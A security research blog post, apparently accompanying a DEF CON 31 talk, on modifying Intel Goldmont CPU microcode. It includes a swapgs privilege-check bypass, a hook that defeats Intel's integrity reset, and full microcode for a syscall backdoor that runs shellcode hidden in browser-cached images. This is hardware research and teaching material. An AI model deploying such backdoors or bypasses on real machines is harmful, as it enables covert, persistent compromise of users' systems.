Hello! In this exploit development and cybersecurity training blog, we will be exploring the depths of Intel SOC CPUs, conducting vulnerability research, and embedding a backdoor deep inside a CPU core by modifying the microcode that makes up the x86 instruction set. We will have a look at Intel’s microarchitecture for the Goldmont CPU series focusing on the Microcode Sequencer (MS).
Normally we think of assembly instructions as atomic operations handled by transistors and hardware, which is only partly true, as modern CISC CPUs translate "high-level" instructions to microcode instructions which we will refer to as macro and micro instructions, respectively, throughout this post.
This post is an in-depth continuation of the talk I gave at Def Con 31, and it’s worth watching before reading, but not required. Talk and slides can be found here: Talk and slides can be found here: Link
Prerequisites and Requirements
To reproduce any findings described throughout this blog post, one will need the following:
-
A red unlocked Intel Goldmont CPU, preferably soldered to a dev board 🙂
-
build-essentials (gcc, make etc.)
-
SPI flash programmer
Doing this research project, we used the UP Squared dev boards, which can be found here.
ONLY TESTED with the Intel® Pentium® N4200
CPU. To red unlock it, one can follow instructions from IntelTXE-PoC with some modifications to the rop-chain as we weren’t able to get the UP board to boot without. Changes can be found at https://github.com/zanderdk/lib-micro/blob/master/bin/exploit.py. We also provide a pre-build image which already comes with a exploit for the Intel Management Engine
To flash the board hookup an SPI Programmer as detailed by coreboot docs and flash the pre-build image using the following command:
sudo flashrom --programmer ch341a_spi -w <path_to_image>
To test if the CPU is in a red unlocked state, we can try to write to the hidden enable bit for microarchitectural instructions. Using the wrmsr (Write model specific register) command line util for linux: sudo wrmsr --all 0x1e6 0x200
if we read back the same value using sudo rdmsr 0x1e6
this means the CPU is red unlocked and all cores have enabled undocumented instructions for microcode debugging.
Debug Instructions
To access the microcode sequencer, we will need to write access to the control register bus (CRBUS), this we gain from unlocking the debug macro instructions as described in this article by Mark Ermlov et. al. In lib-micro source, we find the following implementations for CRBUS read and writes:
__attribute__((always_inline))
u_result_t static inline udbgrd(uint64_t type, uint64_t addr) {
lmfence();
u_result_t res;
asm volatile(
".byte 0x0F, 0x0E\n\t" // udbg instruction for reading
: "=d" (res.value)
, "=b" (res.status)
: "a" (addr)
, "c" (type)
);
lmfence();
return res;
}
__attribute__((always_inline))
u_result_t static inline udbgwr(uint64_t type, uint64_t addr, uint64_t value) {
uint32_t value_low = (uint32_t)(value & 0xFFFFFFFF);
uint32_t value_high = (uint32_t)(value >> 32);
u_result_t res;
lmfence();
asm volatile(
".byte 0x0F, 0x0F\n\t" // udbg instruction for writing
: "=d" (res.value)
, "=b" (res.status)
: "a" (addr)
, "c" (type)
, "d" (value_low)
, "b" (value_high)
);
lmfence();
return res;
}
#define SIMPLERD(name, type) \
__attribute__((always_inline)) \
u64 static inline name(u64 addr) { \
return (u64)udbgrd(type, addr).value; \
}
SIMPLERD(crbus_read, 0x00) // reading crbus
SIMPLEWR(crbus_write, 0x00) // writing crbus
Above, we define C macro for read and write micro architecture debug instructions. The rcx registers specify read/write mode where 0x00
means control register bus, rax is the address to which we will make a read or write. in [edx:ebx]
contains data for the instructions.
The crbus connects internal component’s of the CPU where one of these is the Local Direct Access test (LDAT) from which we can program and inspect various IP units on of which is the Microcode Sequencer, which has the port index 0x6a0
. Below is the implementation from lib-micro for writing to LDAT and MS:
void ldat_array_write(u64 pdat_reg, u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr, u64 val) {
u64 prev = crbus_read(0x692); //disable CPU frontend
crbus_write(0x692, prev | 1);
crbus_write(pdat_reg + 1, 0x30000 | ((dword_idx & 0xf) << 12) | ((array_sel & 0xf) << 8) | (bank_sel & 0xf));
crbus_write(pdat_reg, 0x000000 | (fast_addr & 0xffff));
crbus_write(pdat_reg + 4, val & 0xffffffff);
crbus_write(pdat_reg + 5, (val >> 32) & 0xffff);
crbus_write(pdat_reg + 1, 0);
crbus_write(0x692, prev); //enable CPU frontend
}
void ms_array_write(u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr, u64 val) {
ldat_array_write(0x6a0 /* MS */, array_sel, bank_sel, dword_idx, fast_addr, val);
}
u64 ms_array_read(u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr) {
return ldat_array_read(0x6a0 /* MS */, array_sel, bank_sel, dword_idx, fast_addr); // ldat_array_read is implemented using microcode and explained later
}
LDAT is segmented into arrays, banks, words and addresses, but we will only be focusing on array and addresses as bank and word indices for MS is always zero. The microcode ROM is stored in array 0 and 1, ram in 2 and 4 for a deeper understanding of these arrays, we refer to the lib-micro documentation.
Now we are at a point where we can start writing to the microcode RAM area:
void patch_ucode(u64 addr, ucode_t ucode_patch[], int n) { //write microcode patches
// format: uop0, uop1, uop2, seqword
// uop3 is fixed to a nop and cannot be overridden
for (int i = 0; i < n; i++) {
// patch ucode
ms_rw_code_write(ucode_addr_to_patch_addr(addr + i*4)+0, CRC_UOP(ucode_patch[i].uop0)); //write to array 4
ms_rw_code_write(ucode_addr_to_patch_addr(addr + i*4)+1, CRC_UOP(ucode_patch[i].uop1));
ms_rw_code_write(ucode_addr_to_patch_addr(addr + i*4)+2, CRC_UOP(ucode_patch[i].uop2));
// patch seqword
ms_rw_seq_write(ucode_addr_to_patch_seqword_addr(addr) + i, CRC_SEQ(ucode_patch[i].seqw)); //write to array 2 (RW SEQ)
}
}
The code above will write to MS RAM, which starts at address 0x7c00
and ends at 0x8000
for a detailed overview of look here.
Dumping Microcode
Let’s write some microcode! The first thing we are going to write will be for dumping the microcode ROM area. In the code below, we use the macro language from lib-micro
to assembly microcode.
Microcode is stored in triads which is sets of 3 micro instructions under the control of a sequence word. The sequence word controls execution flow, but for this example, we will only be using NOP_SEQWORD
, which will do nothing and continue execution in the following triad.
Microcode supports encoding immediate values, registers, addresses and macro aliases, but for now we will only be using regs and imms.
We annotate a Destination register with a D
, operand registers R
and immediate values with I
.
Example encoding:
-
MOVE_DSZ64_DR
– moving from register to register and can be read as "move with data size of 64 bits with destination and operand register" -
ZEROEXT_DSZ32_DI
setting a register to an immediate value and can be read as "Zero extend with data size of 32 bits with destination and immediate value"
In microcode, we have access to more than the normal x86 registers, we have 16 temporary registers, which is internal to the CPU core and hidden from the macro world named tmp0-tmp15.
For more details on how to micro-operations are encode, we again refer to the lib-micro
documentation
Micro code for implementing reading from the LDAT:
unsigned long addr = 0x7de0; //location in microcode RAM
ucode_t ucode_patch[] = { // Microcode implementation for reading from LDAT
{ // 0x7de0
// grab arguments from macro world registers (RDI, RSI, RDX)
MOVE_DSZ64_DR(TMP0, RDI), //move port id to TMP0
MOVE_DSZ64_DR(TMP1, RSI), //array index
MOVE_DSZ64_DR(TMP2, RDX), //address to read
NOP_SEQWORD
},
{ // 0x7de4
ZEROEXT_DSZ32_DI(TMP10, 0x0),
ADD_DSZ32_DRI(TMP11, TMP0, 0x1),
ADD_DSZ32_DRI(TMP12, TMP0, 0x2),
NOP_SEQWORD
},
{ // 0x7de8
// pause frontend
MOVEFROMCREG_DSZ64_DI(TMP9, 0x38c),
MOVETOCREG_DSZ64_RI(TMP10, 0x38c),
MOVEFROMCREG_DSZ64_DR(TMP13, TMP11),
NOP_SEQWORD
},
{ // 0x7dec
MOVETOCREG_DSZ64_RR(TMP1, TMP11),
MOVETOCREG_DSZ64_RR(TMP2, TMP0),
MOVEFROMCREG_DSZ64_DR(RAX, TMP12), //read resulting value from CRBUS
NOP_SEQWORD
},
{ // 0x7df0
MOVETOCREG_DSZ64_RR(TMP10, TMP11),
MOVETOCREG_DSZ64_RI(TMP9, 0x38c),
NOP,
END_SEQWORD
},
};
The micro code above will do the same calculation as the ldat_array_write
implemented in C but where the write is switched for a read to rax register. We can now include this code into our C project and start dumping the micro code rom:
u64 ldat_array_read(u64 pdat_reg, u64 array_sel, u64 bank_sel, u64 dword_idx, u64 fast_addr) {
#include "ucode/ldat_read.h" //code from above
patch_ucode(addr, ucode_patch, ARRAY_SZ(ucode_patch)); //insert the micrcode patch at 0x7de0
u64 array_bank_sel = 0x10000 | ((dword_idx & 0xf) << 12) | ((array_sel & 0xf) << 8) | (bank_sel & 0xf);
u64 res = ucode_invoke_3(addr, pdat_reg, array_bank_sel, 0xc00000 | fast_addr);
return res; // will contain the value of rax returned by microcode
}
Wait, how did we get a ucode_invoke_3
?
Another feature of the undocumented udbgwr instructions is a microcode jump, if we place the value 0xd8
into rcx we will treat rax as address into the microcode ROM/RAM address space and directly jump to that address. Using that information, we can construct a C functions for invoking arbitrary microcode addresses as following below:
__attribute__((always_inline))
u64 static inline ucode_invoke_3(u64 addr, u64 arg1, u64 arg2, u64 arg3) {
u64 rax = addr, rcx = 0xD8; //select ucode jump mode
lmfence(); //memory fences for safety
asm volatile(
".byte 0x0F, 0x0F\n\t" //magic udbgwr instruction
: "+a" (rax)
, "+c" (rcx)
, "+rdi" (arg1)
, "+rsi" (arg2)
, "+rdx" (arg3)
:
: "rbx", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"
);
lmfence();
return rax;
}
Now let’s dump it! All we have to do is read from the LDAT in a loop and print the value, and we can dump the microcode ROM and start analyzing:
void ms_array_dump(u64 array_sel, u64 fast_addr, u64 size) {
for (; fast_addr < size; fast_addr+=4) { // loop & read
u64 val0 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr);
u64 val1 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr+1);
u64 val2 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr+2);
u64 val3 = ldat_array_read(0x6a0, array_sel, 0, 0, fast_addr+3);
printf("%04lx: %012lx %012lx %012lx %012lx\n", fast_addr, val0, val1, val2, val3); //print result to stdout
}
}
//implement wrapper for all the 5 MS arrays as described in lib-micro docs.
void ms_ro_code_dump(void){
puts("array 00:");
ms_array_dump(0, 0, 0x7e00);
}
void ms_ro_seqw_dump(void){
puts("array 01:");
ms_array_dump(1, 0, 0x8000);
}
void ms_rw_seqw_dump(void){
puts("array 02:");
ms_array_dump(2, 0, 0x80);
}
void ms_match_n_patch_dump(void){
puts("array 03:");
ms_array_dump(3, 0, 0x20);
}
void ms_rw_code_dump(void){
puts("array 04:");
ms_array_dump(4, 0, 0x200);
}
Woo, we now got a dump of the micro code ROM and using the uCodeDisasm, We can disassemble micro instructions into readable opcode.
Hooking Instructions
With the micro ROM dumped, we can disassemble the micro code, now let’s have a look at how we can change behaviour and modify macro instructions. Another feature in micro code is array free, it consists of 32 entries of match & patch registers. Through trial and error, we found arrived at the following semantics for these registers.
The registers are divided into three bit fields. Where src
and dst
is two micro code addresses shifted right one bit, and p
being a present bit. In ucode_glm.txt We find the dissembled ROM extracted using the above methods, let’s try and program a match & patch register to make a simple change. In lables.txt, We find all xlat’s (macro instructions entry points in MS ROM) we identified so far one of which is swapgs_xlat
. This instruction is swapgs
and it swaps the kernel and user-space segment register gs
:
swapgs_xlat:
U0870: 006302033200 tmp3:= READURAM(0x0002, 64) // read saved GS
U0871: 0c4b20372000 tmp2:= RDSEGFLD(GS, BASE) // read current GS
U0872: 100a02000200 TESTUSTATE(SYS, UST_USER_MODE)
01a711c0 ? SEQW GOTO generate_#GP
// bail if not in privileged mode, by jumping to Ucode generating
// General protection fault.
U0874: 0c7b2d000033 WRSEGFLD(tmp3, GS, BASE)
// write new effective GS
U0875: 204302000232 LFNCEMARK-> WRITEURAM(tmp2, 0x0002, 64)
// Save old GS
04808e72 SEQW GOTO lfence_wait_uend0
// Jump to Ucode for lfence instruction which also uend's the current
// macro instruction. We need this memory barrier as GS is a memory
// segmentation register.
In the micro code above, we also see a branch made from the sequence word. Encoded in the first sequence word is a branch to the Ucode address U2711 == generate_#GP
Because the uip (micro instruction pointer) encoded in the sequence word is a TESTUSTATE
the branch after executing U872
becomes conditional on the test result.
Lets program the following value to a match & patch (0x0874 >> 1) << 16 | (0x0872 >> 1) | 1 == 0x43A0439
This will put at hook on 0x872
and make it jump to 0x874
. We can again achieve this using the xlat with the following C expression:
hook_match_and_patch(0, 0x872 /* src address */, 0x874 /* dst address */);
Wooo, we changed the swapgs from a privileged instruction to a user space instruction by skipping the check, and we can verify this from running:
uint rax = 0x0;
asm volatile(
"swapgs\n\t"
"mov ax, gs"
"swapgs\n\t"
: "=a" (rax)
)
This will leak the kernel gs from user-space. We do the swap twice to not crash the kernel, by leaving kernel gs
as it was. But if we put this in a big loop, we will start observing 0x0
after running for some time…
Hidden side-effect
Through a lot of digging and failed hooks, we discoed hidden side effects placed by Intel in the port IO macro instructions. This instruction will verify the micro code state and reset it if changes are detected. This is also why CustomProcessingUnit fails to persist micro code changes after booting linux and will only persist while still in a UEFI shell. When we tried porting the repository to userspace, at first, nothing seemed to work. Then we realized that we were actually successful in applying a microcode update. It was just very quickly being overwritten with the original update again. After some experimenting, we found that this overwrite would not happen if we just kept the processor busy, and as soon as we created a big enough sleep call or exited the process, it would get overwritten. We suspected that the overwrite was being done from within the microcode
itself, and used this knowledge to trace the entire microcode ROM to create a list of candidate microcode addresses. We eventually traced it all the way down to the exact instruction that led our hook to be overwritten. We created a hook to dump the current value of RIP
(macro instruction pointer) and found that the microcode in question was being called from the function acpi_idle_do_entry
in the Linux Kernel. Specifically, the in al, dx
instruction triggered the code path. From the Linux Kernel source code, the function is explained as ”acpi idle do entry – enter idle state using the appropriate method”. This matches our previous observations that the overwrites only happened when we let the processor idle. We then created a hook to completely skip that branch of the IN instruction, and our microcode was no longer being overwritten. The following code snippet will make all micro code changes persist:
void do_fix_IN_patch() {
// Patch U58ba to U017a
hook_match_and_patch(0x1f, 0x58ba, 0x017a);
}
We will not include the full trace of in
as it is huge, but it can be found in ROM dump above.
// much microcode above
U58b4: 000100032cf2 tmp2:= OR_DSZ32(tmp2, tmp3)
U58b5: 00621d034200 tmp4:= MOVEFROMCREG_DSZ64(0x01d)
U58b6: 002501034234 tmp4:= SHR_DSZ32(tmp4, 0x00000001)
U58b8: 000400032d32 tmp2:= AND_DSZ32(tmp2, tmp4)
U58b9: 000700031c72 tmp1:= NOTAND_DSZ32(tmp2, tmp1)
U58ba: 01507a040231 LFNCEMARK-> UJMPCC_DIRECT_NOTTAKEN_CONDZ(tmp1, U017a)
// force the branch above using match & patch register ^^^^^^^^^^^^^^^^^^^^^
U58bc: 00010003c000 tmp12:= OR_DSZ32(0x00000000)
U58bd: 00ed04030230 tmp0:= ROR_DSZ8(tmp0, 0x00000004)
U58be: 00c001030230 tmp0:= ADD_DSZ8(tmp0, 0x00000001)
U58c0: 002408034230 tmp4:= SHL_DSZ32(tmp0, 0x00000008)
U58c1: 00040f030c08 tmp0:= AND_DSZ32(0x0000000f, tmp0)
U58c2: 000502032c08 tmp2:= SUB_DSZ32(0x00000002, tmp0)
U58c4: 0352d06002b2 LFNCEWTMRK-> UJMPCC_DIRECT_NOTTAKEN_CONDLE(tmp2, U58d0)
U58c5: 2d0bc8031008 tmp1:= PORTIN_DSZ32_ASZ16_SC1(0x00c8)
U58c6: 002510031231 tmp1:= SHR_DSZ32(tmp1, 0x00000010)
// much microcode below
Writing a Backdoor
Now for the fun part, let’s hide a backdoor in the instruction set!
There are a lot of instructions in the x86 instruction set. Many of them are implemented in microcode, which lets us hook them. Utilizing the fact that all browsers will cache files like images that are downloaded from websites, we then hook the syscall
instruction when a write syscall is being run. If the data contains our magic value, we change the syscall
to mprotect
, making the data RWX, and then execute the data as shellcode.
Syscall
Before diving deep into the backdoor, let’s have a quick look at the implementation of the syscall instruction from microcode:
syscall_xlat:
U02e0: 000b01833200 tmp3:= UPDATEUSTATE(!0x04)
U02e1: 006384034200 LFNCEMARK-> tmp4:= READURAM(0x0084, 64) // IA32_LSTAR?
U02e2: 006382031200 tmp1:= READURAM(0x0082, 64) // IA32_LSTAR?
048bb296 SEQW SAVEUIP1 U02e4
SEQW GOTO U0bb2
U02e4: 006520030230 tmp0:= SHR_DSZ64(tmp0, 0x00000020)
U02e5: 008703030c08 tmp0:= NOTAND_DSZ16(0x00000003, tmp0)
U02e6: 004804821008 rcx:= ZEROEXT_DSZ64(IMM_MACRO_ALIAS_RIP)
// Store the address of the next user-space instruction into rcx. ^^^^
0181d280 SEQW GOTO U01d2
From the intel manual read this as the first sentence about syscal
:
SYSCALL invokes an OS system-call handler at privilege level 0. It does so by loading RIP from the IA32_LSTAR MSR (after saving the address of the instruction following SYSCALL into RCX). (The WRMSR instruction ensures that the IA32_LSTAR MSR always contain a canonical address.)
This is exactly what we also read from the micro-code implementation, keep this in mind as it becomes important later.
Implementation
Below is the full implementation of the backdoor used in our demo at Defcon 31 we will try and explain step by step using comments. In our slide a pseudo code version which is more readable, can be found as well.
unsigned long addr = 0x7d30; // Ucode RAM address where we place ucode
unsigned long hook_address = 0x02e0; // syscall_xlat (syscall entry point)
ucode_t ucode_patch[] = {
{ // 0x0
XOR_DSZ64_DRI(TMP5, RAX, 0x1), // check RAX for SYS_WRITE
UJMPCC_DIRECT_NOTTAKEN_CONDZ_RI(TMP5, addr+0x6),
XOR_DSZ64_DRI(TMP5, RAX, 0x12),
// check RAX for pwrite64 a variant of SYS_WRITE
NOP_SEQWORD
},
{ // 0x4
UJMPCC_DIRECT_NOTTAKEN_CONDZ_RI(TMP5, addr+0x6),
UJMP_I(addr+0x2c),
UJMPCC_DIRECT_NOTTAKEN_CONDZ_RI(RSI, addr+0x2c),
// check RSI is not 0x0 and if not assume to be a valid pointer
NOP_SEQWORD
},
{ // 0x8
ZEROEXT_DSZ64_DI(TMP6, 0xd00d),
CONCAT_DSZ16_DRI(TMP6, TMP6, 0xf00d), //put 0xd00dfood into TMP6
ADD_DSZ64_DRI(TMP4, RSI, 0xd8), // tmp4 = rsi + 0xd8
NOP_SEQWORD
},
{ // 0xc
LDZX_DSZ64_ASZ32_SC1_DR(TMP5, TMP4, 0x18), //read magic value from memory
XOR_DSZ64_DRR(TMP5, TMP5, TMP6), //check if we found magic in image data
UJMPCC_DIRECT_NOTTAKEN_CONDNZ_RI(TMP5, addr+0x2c), // bail out if not
NOP_SEQWORD
},
{ // 0x10
// Save regs
// We now save the current register state to memory/image data.
// This is done so we can recover the execution state from memory when
// we finaly achive macro level shell code.
ZEROEXT_DSZ64_DM(TMP5, IMM_MACRO_ALIAS_RIP),
SUB_DSZ64_DIR(TMP5, 0x2, TMP5),
STAD_DSZ64_ASZ32_SC1_RRI(TMP5, TMP4, 0x0, SEG_DS),
NOP_SEQWORD
},
{ // 0x14
STAD_DSZ64_ASZ32_SC1_RRI(RAX, TMP4, 0x8, SEG_DS),
STAD_DSZ64_ASZ32_SC1_RRI(RDI, TMP4, 0x10, SEG_DS),
STAD_DSZ64_ASZ32_SC1_RRI(RSI, TMP4, 0x18, SEG_DS),
NOP_SEQWORD
},
{ // 0x18
STAD_DSZ64_ASZ32_SC1_RRI(RDX, TMP4, 0x20, SEG_DS),
NOP,
// Overwrite regs
// now we modify the register state to prepare a mprotect syscall.
ADD_DSZ64_DRI(TMP5, RSI, 0x100), // jmp rsi+0x100
// ^^^^^^^^^^^^^^^^^^^^^^^ IMPORTANT ^^^^^^^^^^^^^^^^^^^^^^
// We calculate an address into the image data where we have put
// shellcode and save it to TMP5.
NOP_SEQWORD
},
{ // 0x1c
// Now we setup arguments for syscall to do an mprotect instead of
// intended write syscall:
// int mprotect(void *addr, size_t len, int prot);
SUB_DSZ64_DIR(RDI, 0x1000, 0),
AND_DSZ64_DRR(RDI, RDI, RSI), // rdi = rsi & ~0xfff, first argument
// We set addr to rsi & 0x2000 for page alignment.
// This is the area we want to be RWX
ZEROEXT_DSZ64_DI(RSI, 0x2000), // rsi = 0x2000, size
NOP_SEQWORD
},
{ // 0x20
ZEROEXT_DSZ64_DI(RDX, 0x7), // rdx = PROT_READ | PROT_WRITE | PROT_EXEC == 0x7
// above we set the new memory protection flags
ZEROEXT_DSZ64_DI(RAX, 0xa), // rax = mprotect
// finally we change the syscall from a SYS_WRITE to a SYS_MPROTECT
UJMP_I(addr+0x2d),
NOP_SEQWORD
},
{ // 0x24
UJMPCC_DIRECT_NOTTAKEN_CONDNZ_RI(TMP5, addr+0x26),
UJMP_I(addr+0x28),
MOVE_DSZ64_DR(RCX, TMP5),
// ^^^^^^^^^^^^^^^^^^^^^^^ IMPORTANT ^^^^^^^^^^^^^^^^^^^^^^
// This is the final trick!
// Change the return address of the syscall instruction stored in RCX.
// This will make the kernel "think" it should return to our shellcode
// after handling an MPROTECT! of the same area.
SEQ_GOTO2(addr+0x29) | SEQ_NOSYNC
},
{ // 0x28
ZEROEXT_DSZ64_DM(RCX, IMM_MACRO_ALIAS_RIP),
SHR_DSZ64_DRI(TMP0, TMP0, 0x20),
NOTAND_DSZ16_DIR(TMP0, 0x3, TMP0),
SEQ_GOTO2(0x1d2) | SEQ_NOSYNC
},
{ // 0x2c Execute first few instructions in normal syscall
XOR_DSZ64_DRR(TMP5, TMP5, TMP5),
UPDATEUSTATE_NOT_I(0x1) | DST_ENCODE(TMP3),
READURAM_DI(TMP4, 0x84),
SEQ_GOTO2(0x2e2) | SEQ_NOSYNC
}
};
Now with the ìn
side effect gone and the above microcode patch, we can finally place the backdoor using the following C code:
void do_syscall_patch() {
#include "ucode/syscall.h" // code from above
patch_ucode(addr, ucode_patch, ARRAY_SZ(ucode_patch));
hook_match_and_patch(0x12, hook_address, addr);
hook_match_and_patch(0x13, 0x02e4, addr+0x24);
}
We place use 0x12
as our first match & patch register, as the once below is already allocated for actual bug fixes by Intel, and Chrome will nuke the CPU after a couple of seconds if we don’t keep these patches alive. We are still not sure of the root cause but have nailed it down to patch 0x8
being the critical one.
The entire code can be found in our repo, and demo in the presentation from Defcon 31.
Reversing Macro Instructions
Now with a backdoor in place, what’s left to do?
Well, we have seen Chrome crash due to bugs in the CPU, what if we could develop exploits for the CPU itself and with what goal?
If we somehow could gain control of the uip, it could be possible to redirect microcode control flow to the debug instructions and, as such do a red unlock from the software.
Like we have shown in with syscall, we used the documentation as well as pseudo code from the Intel manual as reference implementation while reversing. Another very neat trick is watching changes in the control register bus. As mentioned, the control register bus contains information shared between logic units.
In the control register bus, we find these two registers CORE_CR_CUR_RIP
, CORE_CR_CUR_UIP
at 0x67 and 0x68 respectively. An interesting observation about the UIP pointer is that it will update after executing the instruction. This fact can be abused to back trace entire macro instructions.
Let’s say we wanna find the xlat for swapgs
, we can put a hook on generate_#GP
and run MOVEFROMCREG_DSZ64_D(RAX, CORE_CR_CUR_UIP)
as the first instruction after the hook. Now rax
will contain the address before jumping to generate_#GP
which will leak the address of the last executed privileged macro instruction executed from user-space we control. So if we run swapgs
after placing this hook we will leak its address. In labels.txt we have documented all xlat’s we have found so far.